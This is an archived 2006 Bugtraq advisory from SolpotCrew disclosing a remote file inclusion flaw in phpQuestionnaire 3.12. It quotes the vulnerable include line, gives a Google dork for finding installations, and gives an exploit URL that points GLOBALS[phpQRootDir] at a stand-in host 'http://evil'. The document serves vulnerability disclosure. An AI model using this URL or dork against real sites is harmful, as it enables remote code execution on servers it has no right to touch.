SolpotCrew Advisory #12 - phpQuestionnaire 3.12 (GLOBALS[phpQRootDir]) Remote File Inclusion

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: SolpotCrew Advisory #12 - phpQuestionnaire 3.12 (GLOBALS[phpQRootDir]) Remote File Inclusion
From: chris_hasibuan@xxxxxxxxx
Date: 21 Sep 2006 12:17:07 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

#############################SolpotCrew 
Community################################
#
#  phpQuestionnaire 3.12 (GLOBALS[phpQRootDir]) Remote File Inclusion 
#
#  vendor : http://http://www.chumpsoft.com/products/phpq/
#
#################################################################################
#
#
#       Bug Found By :Solpot a.k.a (k. Hasibuan) (21-09-2006)
#
#       contact: chris_hasibuan@xxxxxxxxx 
# 
#       Website : http://www.nyubicrew.org/adv/solpot-adv-08.txt
#
################################################################################
#
#
#      Greetz: choi , h4ntu , Ibnusina , r4dja , No-profile , begu , madkid
#              robby , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa
#              home_edition2001 , Rendy , cow_1seng , ^^KaBRuTz , bYu , 
Lappet-homo
#              Blue|spy , cah|gemblung , Slacky , blind_boy , camagenta , XdikaX
#              x-ace , Dalmet , th3sn0wbr4in , iFX , ^YoGa^ 
#              and all member solpotcrew community 
#              especially thx to str0ke @ milw0rm.com
#
###############################################################################
Input passed to the "GLOBALS[phpQRootDir]" is not properly verified  
before being used to include files. This can be exploited to execute  
arbitrary PHP code by including files from local or external resources.  

code from inc/ifunctions.php

################################################################################
# phpQuestionnaire                           Version 3.12                      #
# Copyright 2003-2006 chumpsoft, inc.        August 7, 2006                    #
# http://www.chumpsoft.com/products/phpq/    support@xxxxxxxxxxxxx             #
################################################################################
# Use of this program constitutes your agreement to the terms contained in the #
# LICENSE file within this distribution.                                       #
################################################################################

include($GLOBALS["phpQRootDir"] . "inc/tableformat.php");

function ImportSurvey ($fp, $type, $flag) {
        set_time_limit(600);  # Attempt to disable time limit in case upgrade 
takes long


google dork : "phpQuestionnaire v3"

exploit : 
http://somehost/path_to_phpQuestionnaire/inc/ifunctions.php?GLOBALS[phpQRootDir]=http://evil

##############################MY LOVE JUST FOR U RIE#########################  
######################################E.O.F##################################

Prev by Date: Re: mysql_error() can lead to Cross Site Scripting attacks
Next by Date: RSA Keyon Log verification bypass vulnerability
Previous by thread: Call for Papers and Tutorials for the 19th Annual FIRST Conference, June 17– 22, 2007
Next by thread: RSA Keyon Log verification bypass vulnerability
Index(es):
- Date
- Thread